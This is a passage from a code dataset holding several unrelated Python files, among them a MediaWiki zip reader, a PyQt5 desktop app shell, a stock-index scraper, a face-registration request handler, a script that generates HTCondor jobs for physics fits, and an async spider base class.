ZipFile\n \"\"\"\n \n if isinstance(zipfile, ZipFile):\n self.zf = zipfile\n else:\n self.zf = ZipFile(zipfile)\n self.metabook = json.loads(self.zf.read(\"metabook.json\"))\n content = json.loads(self.zf.read('content.json'))\n self.articles = content.get('articles', {})\n self.templates = content.get('templates', {})\n self.sources = content.get('sources', {})\n \n def _getArticle(self, title, revision=None):\n try:\n article = self.articles[title]\n if revision is None or article['revision'] == revision:\n return article\n except KeyError:\n pass\n return None\n \n def getSource(self, title, revision=None):\n \"\"\"Return source for article with given title and revision\n \n @param title: article title\n @type title: unicode\n \n @param revision: article revision (optional)\n @type revision: unicode\n \"\"\"\n \n article = self._getArticle(title, revision=revision)\n if article is None:\n return None\n try:\n return self.sources[article['source-url']]\n except KeyError:\n return None\n \n def getInterwikiMap(self, title, revision=None):\n \"\"\"Return interwikimap for given article and revision\n \n @returns: interwikimap, i.e. dict mapping prefixes to interwiki data\n @rtype: dict\n \"\"\"\n \n source = self.getSource(title, revision=revision)\n if source is None:\n return None\n return source.get('interwikimap', None)\n \n def getRawArticle(self, title, revision=None):\n ns, partial, full = namespace.splitname(title)\n if ns==namespace.NS_TEMPLATE:\n return self.getTemplate(partial)\n article = self._getArticle(title, revision=revision)\n if article:\n result = article['content']\n if isinstance(result, str): # fix bug in some simplejson version w/ Python 2.4\n return unicode(result, 'utf-8')\n return result\n return None\n \n def getURL(self, title, revision=None):\n article = self._getArticle(title, revision=revision)\n if article:\n return article['url']\n return None\n \n def getAuthors(self, title, revision=None):\n article = self._getArticle(title, revision=revision)\n if article:\n return article.get('authors', [])\n return None\n \n def getTemplate(self, name, followRedirects=True):\n ns, name, full = namespace.splitname(name, namespace.NS_TEMPLATE)\n if ns!=namespace.NS_TEMPLATE:\n return self.getRawArticle(full)\n \n \n try:\n result = self.templates[name]['content']\n if isinstance(result, str): # fix bug in some simplejson version w/ Python 2.4\n return unicode(result, 'utf-8')\n return result\n except KeyError:\n pass\n return None\n \n\nclass ImageDB(object):\n def __init__(self, zipfile, tmpdir=None):\n \"\"\"\n @type zipfile: basestring or ZipFile\n \"\"\"\n \n if isinstance(zipfile, ZipFile):\n self.zf = zipfile\n else:\n self.zf = ZipFile(zipfile)\n content = json.loads(self.zf.read('content.json'))\n self.images = content['images']\n self._tmpdir = tmpdir\n self.diskpaths = {}\n \n def clear(self):\n if self._tmpdir is not None:\n shutil.rmtree(self._tmpdir)\n \n @property\n def tmpdir(self):\n if self._tmpdir is None:\n self._tmpdir = unicode(tempfile.mkdtemp())\n return self._tmpdir\n\n def getPath(self, name, size=None):\n url = self.getURL(name, size=size)\n if url is None:\n return\n path = urlparse.urlparse(url)[2]\n pos = path.find('/thumb/')\n if pos >= 0:\n return path[pos + 1:]\n if path.count('/') >= 4:\n prefix, repo, hash1, hash2, name = url.rsplit('/', 4)\n return '%s/%s/%s/%s' % (repo, hash1, hash2, name)\n return path\n \n def getDiskPath(self, name, size=None):\n try:\n return self.diskpaths[name]\n except KeyError:\n pass\n try:\n data = self.zf.read('images/%s' % name.replace(\"'\", '-').encode('utf-8'))\n except KeyError: # no such file\n return None\n \n try:\n ext = '.' + name.rsplit('.', 1)[1]\n except IndexError:\n ext = ''\n if ext.lower() == '.svg':\n ext = '.svg.png'\n elif ext.lower() == '.gif':\n ext = '.gif.png'\n res = os.path.join(self.tmpdir, 'image%04d%s' % (len(self.diskpaths), ext))\n self.diskpaths[name] = res\n f=open(res, \"wb\")\n f.write(data)\n f.close()\n return res\n \n def getImageTemplates(self, name, wikidb=None):\n try:\n return self.images[name]['templates']\n except KeyError:\n return []\n \n def getContributors(self, name, wikidb=None):\n try:\n return self.images[name]['contributors']\n except KeyError:\n return []\n \n def getPath(self):\n raise NotImplemented('getPath() does not work with zipwiki.ImageDB!')\n \n def getURL(self, name, size=None):\n try:\n return self.images[name]['url']\n except KeyError:\n return None\n \n def getDescriptionURL(self, name):\n try:\n return self.images[name]['descriptionurl']\n except KeyError:\n return None\n \n def clean(self):\n if self._tmpdir:\n shutil.rmtree(self._tmpdir, ignore_errors=True)\n \n\n\n\nclass FakeImageDB(ImageDB):\n\n imagedata = '\\x89PNG\\r\\n\\x1a\\n\\x00\\x00\\x00\\rIHDR\\x00\\x00\\x03 \\x00\\x00\\x01\\xe0\\x01\\x03\\x00\\x00\\x00g\\xc9\\x9b\\xb6\\x00\\x00\\x00\\x01sRGB\\x00\\xae\\xce\\x1c\\xe9\\x00\\x00\\x00\\x06PLTE\\xff\\xff\\xff\\x00\\x00\\x00U\\xc2\\xd3~\\x00\\x00\\x00\\tpHYs\\x00\\x00\\x0b\\x13\\x00\\x00\\x0b\\x13\\x01\\x00\\x9a\\x9c\\x18\\x00\\x00\\x00EIDATx\\xda\\xed\\xc1\\x01\\x01\\x00\\x00\\x00\\x82 \\xff\\xafnH@\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00/\\x06\\xbd`\\x00\\x01`<5\\x84\\x00\\x00\\x00\\x00IEND\\xaeB`\\x82'\n\n def __init__(self, tmpdir=None):\n \"\"\"\n @type zipfile: basestring or ZipFile\n \"\"\"\n self._tmpdir = tmpdir \n \n def getDiskPath(self, name, size=None):\n res = os.path.join(self.tmpdir, 'blank.png')\n if not os.path.exists(res):\n open(res, \"w\").write(self.imagedata)\n return res\n \n def getPath(self):\n raise NotImplemented('getPath() does not work with zipwiki.FakeImageDB!')\n \n def getURL(self, name):\n raise NotImplemented('getURL() does not work with zipwiki.FakeImageDB!')\n \n def getDescriptionURL(self, name):\n raise NotImplemented('getDescriptionURL() does not work with zipwiki.FakeImageDB!')\n \n def getImageTemplates(self, name, wikidb=None):\n raise NotImplemented('getImageTemplates() does not work with zipwiki.FakeImageDB!')\n \n\n\n","sub_path":"utils/mwlib/zipwiki.py","file_name":"zipwiki.py","file_ext":"py","file_size_in_byte":7736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"635329056","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nimport logging\nfrom os import getcwd, environ, path as ospath\nfrom sys import argv\nfrom sys import exit as sys_exit\nfrom sys import path as jppath\n\n# 下面行解决造生成exe后闪退,请不要注释或删除\n# 命令行下运行出现如下提示\n# ImportError: unable to find Qt5Core.dll on PATHImportError: unable to find Qt5Core.dll on PATH\n# 的问题\nimport fix_qt_import_error\n\nfrom PyQt5 import sip\nfrom PyQt5.QtCore import QMetaObject, Qt, QThread\nfrom PyQt5.QtGui import QIcon, QPixmap, QGuiApplication\nfrom PyQt5.QtWidgets import (QApplication, QHBoxLayout, QLabel, QMainWindow,\n QProgressBar, QPushButton, QTreeWidgetItem,\n QWidget, QMessageBox)\n\nfrom lib.JPDatabase.Database import JPDb, JPDbType\nfrom lib.JPFunction import readQss, setWidgetIconByName, seWindowsIcon\nfrom lib.JPPublc import JPPub, JPUser\n\n\nfrom lib.JPForms.JPFormBackup import Form_Backup\nfrom lib.JPForms.JPFormConfig import Form_Config\nfrom lib.JPForms.JPFormEnumManger import Form_EnumManger\nfrom lib.JPForms.JPFormUser import Form_User\n\nfrom Ui.Ui_FormMain import Ui_MainWindow\nfrom Ui.Ui_FormBackGround import Ui_Form as Ui_Form_back\nfrom lib.JPConfigInfo import ConfigInfo\n\n\nclass Form_Background(Ui_Form_back):\n def __init__(self, mainform):\n super().__init__()\n self.Widget = QWidget()\n self.setupUi(self.Widget)\n # self.label.setPixmap(mainform.backPixmap)\n self.label.setText(\"\")\n mainform.addForm(self.Widget)\n\n\ndef loadTreeview(treeWidget, items, MF):\n class MyThreadReadTree(QThread): # 加载功能树的线程类\n def __init__(self, treeWidget, items, MF):\n super().__init__()\n treeWidget.clear()\n root = QTreeWidgetItem(treeWidget)\n root.setText(0, \"功能列表\")\n root.FullPath = \"Function\"\n self.root = root\n self.items = items\n #self.icoPath = MF.icoPath\n\n def addItems(self, parent, items):\n pub = JPPub()\n for r in items:\n item = QTreeWidgetItem(parent)\n item.setText(0, r[\"fMenuText\"])\n item.setIcon(0, QIcon(pub.getIcoPath(r[\"fIcon\"])))\n item.jpData = r\n item.FullPath = (parent.FullPath + '\\\\' + r[\"fMenuText\"])\n lst = [l for l in self.items if l[\"fParentId\"] == r[\"fNMID\"]]\n self.addItems(item, lst)\n item.setExpanded(1)\n\n def run(self): # 线程执行函数\n lst = [l for l in self.items if l[\"fParentId\"] == 1]\n self.addItems(self.root, lst)\n self.root.setExpanded(True)\n\n def getRoot(self):\n return\n\n _readTree = MyThreadReadTree(treeWidget, items, MF)\n _readTree.run()\n\n\nclass JPMainWindow(QMainWindow):\n def __init__(self, dataBaseType: JPDbType = JPDbType.MySQL, *args, **kwargs):\n super(JPMainWindow, self).__init__(*args, **kwargs)\n try:\n db = JPDb()\n db.setDatabaseType(dataBaseType)\n JPPub().MainForm = self\n except Exception as e:\n QMessageBox.warning(self, \"提示\", str(e))\n\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n self.ui.label_Title.setText(\"\")\n self.commandDict = {}\n self.logoPixmap = None\n\n self.addOneButtonIcon(self.ui.ChangeUser, \"changeuser.png\")\n self.addOneButtonIcon(self.ui.ChangePassword, \"changepassword.png\")\n # self.addLogoToLabel(self.ui.label_logo)\n\n # 用户及密码修改功能\n objUser = JPUser()\n objUser.INIT() # 程序开始时只初始化一次\n objUser.userChange.connect(self.onUserChanged)\n objUser.currentUserID()\n self.ui.ChangeUser.clicked.connect(objUser.changeUser)\n self.ui.ChangePassword.clicked.connect(objUser.changePassword)\n\n # 堆叠布局\n self.ui.stackedWidget.removeWidget(self.ui.page)\n self.ui.stackedWidget.removeWidget(self.ui.page_2)\n\n # 隐藏树标题\n self.ui.label_FunPath.setText('')\n self.ui.treeWidget.setHeaderHidden(True)\n\n # 设置状态条中的进度条及标签\n self.Label = QLabel(\" \")\n self.ProgressBar = QProgressBar()\n self.statusBar = self.statusBar()\n self.statusBar.addPermanentWidget(self.Label)\n self.statusBar.addPermanentWidget(self.ProgressBar)\n self.ProgressBar.setGeometry(0, 0, 100, 5)\n self.ProgressBar.hide()\n self.statusBar.hide()\n\n self.ui.splitter.setStretchFactor(0, 2)\n self.ui.splitter.setStretchFactor(1, 11)\n\n # 连接点击了功能树中的节点到函数\n self.ui.treeWidget.itemClicked[QTreeWidgetItem, int].connect(\n self.treeViewItemClicked)\n\n def closeEvent(self, event):\n q = QMessageBox\n result = q.question(self,\n \"请确认\",\n \"退出前是否要备份数据 ?\",\n q.Yes | q.No, q.No)\n if result == QMessageBox.Yes:\n mypath = JPPub().getConfigData()[\"archives_path\"]\n to = ospath.join(mypath, \"backup.sql\")\n Form_Backup(to)\n event.accept()\n\n def showInfo(self, range):\n self.ProgressBar.show()\n self.ProgressBar.setRange(0, range)\n self.statusBar.clearMessage()\n self.statusBar.show()\n QGuiApplication.processEvents()\n\n def dispInfo(self, text, value=0):\n self.statusBar.showMessage(text)\n if value:\n self.ProgressBar.setValue(value)\n QGuiApplication.processEvents()\n\n def hideInfo(self):\n self.ProgressBar.hide()\n self.ProgressBar.setRange(0, 0)\n self.statusBar.clearMessage()\n self.statusBar.hide()\n QGuiApplication.processEvents()\n\n def treeViewItemClicked(self, item, i):\n # 当点击了功能树中的节点时\n try:\n self.ui.label_FunPath.setText(item.FullPath)\n self.__getStackedWidget(item.jpData)\n except AttributeError as e:\n print(str(e))\n\n def onUserChanged(self, args):\n self.ui.label_UserName.setText(args[1])\n loadTreeview(self.ui.treeWidget, JPUser().currentUserRight(), self)\n Form_Background(self)\n\n def addForm(self, form):\n st = self.ui.stackedWidget\n if st.count() > 0:\n temp = st.widget(0)\n st.removeWidget(temp)\n try:\n JPPub().UserSaveData.disconnect(temp.UserSaveData)\n except Exception:\n pass\n del temp\n st.addWidget(form)\n\n def getIcon(self, icoName) -> QIcon:\n return QIcon(JPPub().getIcoPath(icoName))\n\n def getPixmap(self, icoName) -> QPixmap:\n return QPixmap(JPPub().getIcoPath(icoName))\n\n def addOneButtonIcon(self, btn, icoName):\n icon = QIcon(JPPub().getIcoPath(icoName))\n btn.setIcon(icon)\n\n def addLogoToLabel(self, label):\n if self.logoPixmap:\n label.setPixmap(self.logoPixmap)\n\n def addButtons(self, frm: QWidget, btns, styleName='Layout_Button'):\n \"\"\"给窗体中Layout_Button的布局添加按钮\"\"\"\n layout = frm.findChild((QHBoxLayout, QWidget), styleName)\n if not (layout is None):\n layout.setSpacing(2)\n for m in btns:\n btn = QPushButton(m['fMenuText'])\n btn.NMID = m['fNMID']\n btn.setObjectName(m['fObjectName'])\n self.addOneButtonIcon(btn, m['fIcon'])\n btn.setEnabled(m['fHasRight'])\n layout.addWidget(btn)\n else:\n errStr = \"窗体【{}】中没有找到名为'【Layout_Button】'的布局\".format(\n frm.objectName())\n errStr = errStr+\",无法添加按钮。\"\n logging.getLogger().warning(errStr)\n # 设置按名称执行槽函数\n QMetaObject.connectSlotsByName(frm)\n\n def __getStackedWidget(self, sysnavigationmenus_data):\n '''窗体切换'''\n frm = None\n btns = sysnavigationmenus_data['btns']\n self.menu_id = sysnavigationmenus_data['fNMID']\n sys_formCreater = {\n 10: Form_EnumManger,\n 13: Form_User,\n 14: Form_Config\n }\n form_createor = {**sys_formCreater, **self.commandDict}\n if self.menu_id == 12:\n self.close()\n elif self.menu_id in form_createor:\n frm = form_createor[self.menu_id](self)\n else:\n frm = Form_Background(self)\n # 尝试给窗体添加按钮,要求窗体中有一个名为 “Layout_Button”的布局\n self.addButtons(frm, btns)\n return\n\n\nclass JPMianApp():\n def __init__(self, defultConfigDict: dict):\n \"\"\"用户应用程序\"\"\"\n super().__init__()\n # 高清屏设置\n QApplication.setAttribute(Qt.AA_EnableHighDpiScaling)\n QApplication.setStyle('Fusion')\n self.__app = QApplication(argv)\n cfg = ConfigInfo(defultConfigDict)\n self.__mainForm = JPMainWindow()\n\n # 根据配置文件设置文件及日志级别日志级别\n level = int(cfg.debug.level)\n fn = cfg.debug.logfile\n logger = logging.getLogger()\n logger.setLevel(level)\n f_handler = logging.FileHandler(fn, encoding=\"utf-8\", mode=\"a\")\n f_handler.setLevel(level)\n f_handler.setFormatter(logging.Formatter(\n \"%(asctime)s - %(levelname)s - %(filename)s line[:%(lineno)d] - %(message)s\"))\n conHandler = logging.StreamHandler()\n conHandler.setLevel(level)\n conHandler.setFormatter(logging.Formatter(\n \"%(asctime)s - %(levelname)s - %(filename)s line[:%(lineno)d] - %(message)s\"))\n logger.addHandler(f_handler)\n logger.addHandler(conHandler)\n\n def show(self):\n \"\"\"启动应用程序\"\"\"\n # 启动数据改变事件的监听\n JPPub().receiveMessage(self.__app)\n self.__mainForm.showMaximized()\n sys_exit(self.__app.exec_())\n\n def setCommand(self, dict: dict):\n \"\"\"保存用户窗体ID及对应对象的一个\"\"\"\n self.__mainForm.commandDict = dict\n\n def setMainFormLogo(self, logoName: str):\n '''设置主窗体Logo图标,参数为图标文件名'''\n pixmap = QPixmap(JPPub().getLogoPath(logoName))\n self.__mainForm.ui.label_logo.setPixmap(pixmap)\n self.__mainForm.logoPixmap = pixmap\n\n def setAppIcon(self, logoName: str):\n '''设置主应用程序图标,参数为图标文件名'''\n icon = QIcon()\n icon.addPixmap(\n QPixmap(JPPub().getIcoPath(logoName)))\n self.__mainForm.setWindowIcon(icon)\n\n def setMainFormTitle(self, title: str):\n '''设置主应用标题及主窗口顶部文字'''\n self.__mainForm.ui.label_Title.setText(title)\n self.__mainForm.setWindowTitle(title)\n\n\nif __name__ == \"__main__\":\n app = JPMianApp()\n dic = {}\n app.setCommand(dic)\n app.show()\n","sub_path":"app/mainApp.py","file_name":"mainApp.py","file_ext":"py","file_size_in_byte":11131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"317386910","text":"import mechanicalsoup\nimport json\n\n\nclass Nifty50:\n def getnifty50(self):\n browser = mechanicalsoup.StatefulBrowser()\n url = \"https://www.nseindia.com/live_market/dynaContent/live_watch/stock_watch/niftyStockWatch.json\"\n response = browser.open(url)\n output = json.loads(response.text)\n return output\n\n def populate(self):\n browser = mechanicalsoup.StatefulBrowser()\n url = \"https://www.nseindia.com/live_market/dynaContent/live_watch/stock_watch/niftyStockWatch.json\"\n response = browser.open(url)\n output = json.loads(response.text)\n #print(output)\n #file = open(\"nifty50.txt\", \"w\")\n with open('nifty50.json', 'w') as outfile:\n json.dump(output, outfile)\n #file.write(str(output))\n #print(\"After write\")\n return True\n\n def getBankIndex(self):\n bankvalue = \"\"\n data = json.load(open('nifty50.json'))\n bankvalue = data[\"advances\"]\n return bankvalue\n\n","sub_path":"Nifty50.py","file_name":"Nifty50.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"533987476","text":"# -*- encoding: utf-8 -*-\nimport logging\n\nfrom handlers.mainHandler import MainHandler\nfrom interface.faceAdd import faceAdd\nfrom interface.faceUpdate import faceUpdate\nfrom utils.errorCodeManager import ServerError, ClientError\nfrom utils.helper import getTimeRotatingLogger, decodeImage, getImageSavePrefix, SUCCESS_FLAG_0, SUCCESS_FLAG_1\n\nDONT_REPLACE_FLAG = 0\n\nclass FaceAdd(MainHandler):\n \"\"\"\n 实现人脸注册\n 1. 验证注册请求接口数据的完整性,如果缺少信息就返回失败并提示\n 2. 保存请求的图片\n 3. 实现注册并记录日志\n \"\"\"\n\n def get(self):\n self.write(\"Connected\")\n\n def post(self):\n ## STEP1: 设置响应头\n self._set_response_header()\n\n ## STEP2: 解析请求body\n data = self._parse_request_body()\n if not data:\n return\n\n ## STEP3: 校验请求非空且必传的入参\n normal = self.verify_face_add_request_integrity(data)\n if not normal:\n return\n\n app_id = data[\"app_id\"]\n uid = data[\"uid\"].strip()\n image = data[\"image\"]\n is_rep = self.get_is_rep(data)\n quality_level = self.get_quality_level(data)\n\n ## STEP4: 得到日志记录器\n log = getTimeRotatingLogger(app_id, logging.INFO)\n\n ## STEP5: 解码图片\n try:\n img = decodeImage(image)\n except Exception as e:\n self.set_response_body(SUCCESS_FLAG_0, ServerError.IMG_DECODE_FAILED)\n log.exception(e)\n self.finish()\n return\n\n\n try:\n ## STEP6: 保存请求图片\n img_name = getImageSavePrefix() + '.png';\n self.save_request_image(app_id, img_name, img)\n\n ## STEP7: 业务逻辑处理\n success_flag, error = faceAdd(uid, img, self.frp, quality_level, app_id)\n\n if success_flag == SUCCESS_FLAG_1:\n self.write({\n \"success\": success_flag,\n })\n log.info(\"图片:%s 用户ID:%s 人脸注册成功\" % (img_name, uid)) # 记录日志\n elif is_rep != DONT_REPLACE_FLAG and error == ServerError.USER_ALREADY_EXISTS:\n self.face_update(uid, img, img_name, log, quality_level, app_id)\n else:\n self.set_response_body(success_flag, error)\n log.error(\"图片:%s 用户ID:%s 人脸注册失败! %s\" % (img_name, uid, error.message)) # 记录日志\n except Exception as e:\n self.set_response_body(SUCCESS_FLAG_0, ServerError.FACE_ADD_FAILED)\n log.error(\"图片:%s 用户ID:%s 人脸注册失败! %s\" % (img_name, uid, e.args[0])) # 记录日志\n log.exception(e)\n finally:\n self.finish()\n return\n\n def verify_face_add_request_integrity(self, request_body):\n \"\"\"\n 检查请求数据的完整性,包括app_id, uid, image...\n :param request_body: 请求主体\n :return: 是否正常,如果所有需要的信息都存在返回true,否则返回false\n \"\"\"\n if \"app_id\" not in request_body.keys():\n self.set_response_body(SUCCESS_FLAG_0, ClientError.NECESSARY_PARAMETER_MISSING)\n self.finish()\n return False\n\n if \"uid\" not in request_body.keys() or \"image\" not in request_body.keys():\n self.set_response_body(SUCCESS_FLAG_0, ClientError.NECESSARY_PARAMETER_MISSING)\n self.finish()\n return False\n\n return True\n\n def get_is_rep(self, request_body):\n if \"is_rep\" in request_body.keys():\n return request_body[\"is_rep\"]\n else:\n return DONT_REPLACE_FLAG\n\n def face_update(self, uid, img, img_name, log, quality_level, app_id):\n try:\n success_flag, error = faceUpdate(uid, img, self.frp, quality_level, app_id)\n if success_flag == SUCCESS_FLAG_1:\n self.write({\n \"success\": success_flag,\n })\n log.info(\"图片:%s 用户ID:%s 人脸更新成功\" % (img_name, uid)) # 记录日志\n else:\n self.set_response_body(success_flag, error)\n log.error(\"图片:%s 用户ID:%s 人脸更新失败! %s\" % (img_name, uid, error.message)) # 记录日志\n except Exception as e:\n self.set_response_body(SUCCESS_FLAG_0, ServerError.FACE_UPDATE_FAILED)\n log.error(\"图片:%s 用户ID:%s 人脸更新失败! %s\" % (img_name, uid, e.args[0])) # 记录日志\n log.exception(e)\n\n\n\n\n\n","sub_path":"face_server/handlers/faceAddHandler.py","file_name":"faceAddHandler.py","file_ext":"py","file_size_in_byte":4652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"182572831","text":"#!/usr/bin/env python\nimport os\nimport sys\nfrom glob import glob\n#from configparser import ConfigParser\nimport numpy as np\nimport stat\n\nopr = {\n 'cW': [-1,1],\n 'cHWB': [-20,20],\n 'cHl3' : [-2,2],\n 'cHq1':[-4,4],\n 'cHq3': [-4,4],\n 'cll1': [-2,2],\n 'cHbox': [-20,20],\n 'cHDD' : [-20,20], \n 'cHl1' : [-20,20], \n 'cHW': [-8,8] , \n 'cqq11': [-2,2] , \n 'cqq1' : [-2,2] , \n 'cqq31': [-2,2] , \n 'cqq3': [-3,3] , \n 'cll': [-5,5] \n}\n\ndef redemensionOpinput(config):\n sample = config.getlist(\"general\", \"sample\")\n ops = config.getlist(\"eft\", \"operators\")\n\n ops = [i[1:-1].split(\":\") for i in ops]\n ops = [list(map(str, sublist)) for sublist in ops]\n\n if len(sample) > len(ops) and len(ops) == 1:\n return ops*len(samples)\n\n elif len(sample) > len(ops) and len(ops) == 1:\n sys.exit(\"[ERROR] Ambiguity in the definition of samples and op per sample\")\n \n else:\n return ops\n\ndef createOpRange(config):\n\n if not config.has_option(\"eft\", \"fitranges\"): \n all_ops = np.unique([item for subs in redemensionOpinput(config) for item in subs])\n return dict((i, [-10,10]) for i in all_ops)\n \n else:\n or_ = config.getlist(\"eft\", \"fitranges\")\n return dict( (i.split(\":\")[0], [ float(i.split(\":\")[1]) , float(i.split(\":\")[2]) ] ) for i in or_ )\n\ndef makeT2WFitCondor(path, model, ops, opr, npoints):\n path = os.path.abspath(path)\n\n modeltot2w = {\n \"EFT\": \"EFT\",\n \"EFTNeg\": \"EFTNegative\",\n \"EFTNeg-alt\": \"EFTNegative\"\n }\n\n mod = modeltot2w[model]\n ranges = \":\".join(\"k_\"+op+\"={},{}\".format(opr[op][0],opr[op][1]) for op in ops)\n\n f = open(path + \"/submit.sh\", 'w')\n f.write(\"#!/bin/sh\\n\")\n f.write(\"#-----------------------------------\\n\")\n f.write(\"# Automatically generated # \\n\")\n f.write(\"# by mkDCInputs.py # \\n\")\n f.write(\"#-----------------------------------\\n\")\n f.write(\"\\n\\n\\n\")\n\n f.write(\"source /cvmfs/cms.cern.ch/cmsset_default.sh\\n\")\n f.write(\"cd {}\\n\".format(path))\n f.write(\"eval `scram run -sh`\\ncd -\\n\")\n f.write(\"cp -r {} ./\\n\".format(path))\n\n to_w = \"text2workspace.py {}/datacard.txt -P HiggsAnalysis.AnalyticAnomalousCoupling.AnomalousCoupling{}:analiticAnomalousCoupling{} -o model.root \\\n --X-allow-no-signal --PO eftOperators={}\".format(path, mod, mod, \",\".join(op for op in ops)) \n if \"alt\" in model: to_w += \" --PO eftAlternative\"\n \n to_w += \"\\n\"\n f.write(to_w)\n\n f.write(\"#-----------------------------------\\n\")\n to_w = \"combine -M MultiDimFit model.root --algo=grid --points {} -m 125 -t -1 --robustFit=1 --X-rtd FITTER_NEW_CROSSING_ALGO --X-rtd FITTER_NEVER_GIVE_UP --X-rtd FITTER_BOUND --redefineSignalPOIs {} --freezeParameters r --setParameters r=1 --setParameterRanges {} --verbose -1\".format(npoints, \",\".join(\"k_\"+op for op in ops), ranges)\n to_w += \"\\n\"\n f.write(to_w)\n f.write(\"cp model.root {}\\n\".format(path))\n f.write(\"cp higgsCombineTest.MultiDimFit.mH125.root {}\\n\".format(path))\n \n f.close()\n\n st = os.stat(path + \"/submit.sh\")\n os.chmod(path + \"/submit.sh\", st.st_mode | stat.S_IEXEC)\n\ndef makeBatchSub(path):\n path = os.path.abspath(path)\n f = open(path + \"/submit.sub\", 'w')\n f.write(\"executable = {}/submit.sh\\n\".format(path))\n f.write(\"output = {}/submit.out\\n\".format(path))\n f.write(\"error = {}/submit.err\\n\".format(path))\n f.write(\"log = {}/submit.log\\n\".format(path))\n f.write(\"queue 1\\n\")\n f.write(\"+JobFlavour = 'microcentury'\\n\")\n f.close()\n\ndef makeSub(path_, all_paths):\n\n f = open(path_ + \"/submit_all.sh\", 'w')\n for path in all_paths:\n f.write(\"condor_submit {}/submit.sub\\n\".format(path))\n f.write(\"# ------------------------------------------------------ #\\n\")\n\n f.close()\n st = os.stat(path_ + \"/submit_all.sh\")\n os.chmod(path_ + \"/submit_all.sh\", st.st_mode | stat.S_IEXEC)\n\nif __name__ == \"__main__\":\n\n \"\"\"\n if len(sys.argv) < 5: sys.exit(\"[ERROR] Provide folder path, prefix, process name, config file, after running mkDatacards.py ...\")\n\n subf = glob(sys.argv[1] + \"/*/\")\n prefix = sys.argv[2]\n process = sys.argv[3]\n cfg = sys.argv[4]\n npoints = 20000\n if len(sys.argv) > 5:\n npoints = sys.argv[5]\n\n config = ConfigParser(converters={'list': lambda x: [str(i.strip()) for i in x.split(',')]})\n config.read(cfg)\n \"\"\"\n\n if len(sys.argv) < 4: sys.exit(\"[ERROR] Provide folder path, prefix, process name, [npoints = 20000], [models = EFTNeg] after running mkDatacards.py ...\")\n\n subf = glob(sys.argv[1] + \"/*/\")\n prefix = sys.argv[2]\n process = sys.argv[3]\n npoints = 20000\n models = [\"EFTNeg\"]\n if len(sys.argv) > 4:\n npoints = sys.argv[4]\n if len(sys.argv) > 5:\n models = sys.argv[5].split(\",\")\n all_sub_paths = []\n\n print(\". . . @ @ @ Retrieving folders @ @ @ . . .\")\n \n for s in subf:\n subfolder = s.split(\"/\")[-2]\n prc = subfolder.split(prefix+\"_\")[-1]\n ops = prc.split(process + \"_\")[-1]\n ops = ops.split(\"_\")\n \n for model in models:\n vars_ = glob(s + \"/\" + model + \"/datacards/\" + prc + \"/*/\")\n print(\"[INFO] Running: {}, model: {}, tot fits: {}\".format(s, model, len(vars_)))\n for v in vars_:\n makeT2WFitCondor(v, model, ops, opr, npoints)\n makeBatchSub(v)\n\n all_sub_paths.append(os.path.abspath(v))\n\n makeSub(sys.argv[1], all_sub_paths)\n\n print(\". . . @ @ @ Done @ @ @ . . .\")\n\n\n\n\n\n","sub_path":"createCondor.py","file_name":"createCondor.py","file_ext":"py","file_size_in_byte":5645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"213553065","text":"import requests\n\n# Djangoのuploadビューが呼ばれるURL\nurl = 'http://127.0.0.1:8000/upload/'\n\n# ビュー内でのrequest.FILES['file']の'file'に対応\nfile = {'file': open('sample.png', 'rb')}\n\n# 送信する。\nres = requests.post(url, files=file)\n\n# res.textに、画像にアクセスするためのURLが入っています。\nprint(res.text)\n","sub_path":"upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"40865343","text":"from setuptools import setup\n\nrequires = [\n 'fedmsg',\n]\n\nsetup(\n name='bugyou',\n version='0.1',\n description='',\n author='',\n author_email='',\n url='https://github.com/kushaldas/autocloud',\n install_requires=requires,\n packages=[],\n include_package_data=True,\n zip_safe=False,\n classifiers=[\n 'Environment :: Web Environment',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Intended Audience :: Developers',\n 'Programming Language :: Python',\n ],\n entry_points={\n 'moksha.consumer': [\n \"bugyou_consumer = bugyou.consumer:BugyouConsumer\",\n ],\n },\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"263207914","text":"from crawler.asyncSpider.core.start_spider import run\nfrom crawler.asyncSpider.utils.utils import logger\n\n\nclass AsyncSpider(object):\n name = None\n crawler = None\n custom_setting = {}\n\n def __init__(self, crawler, name=None, **kwargs):\n AsyncSpider.crawler = crawler\n self.logger = logger\n self._set_crawler(crawler)\n if name is not None:\n self.name = name\n if not hasattr(self, \"start_urls\"):\n self.start_urls = []\n\n @classmethod\n def from_crawler(cls, crawler, *args, **kwargs):\n spider = cls(crawler, *args, **kwargs)\n\n return spider\n\n @classmethod\n def start_spider(cls, spider=None):\n run(spider)\n\n @classmethod\n def stop_spider(cls):\n cls.crawler.stop()\n\n def _set_crawler(self, crawler):\n self.crawler = crawler\n self._load_settings()\n\n def _load_settings(self):\n self.settings = self.crawler.settings\n self.settings.set_dict(self.custom_setting)\n\n async def start_requests(self):\n raise NotImplementedError","sub_path":"crawler/asyncSpider/core/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"61851573","text":"import numpy as np\n\n\nnp.random.seed(42)\nx_1 = np.random.randn(100,1)\nx_2 = np.random.randn(100,1)\n\n\ndef sigmoid(x): 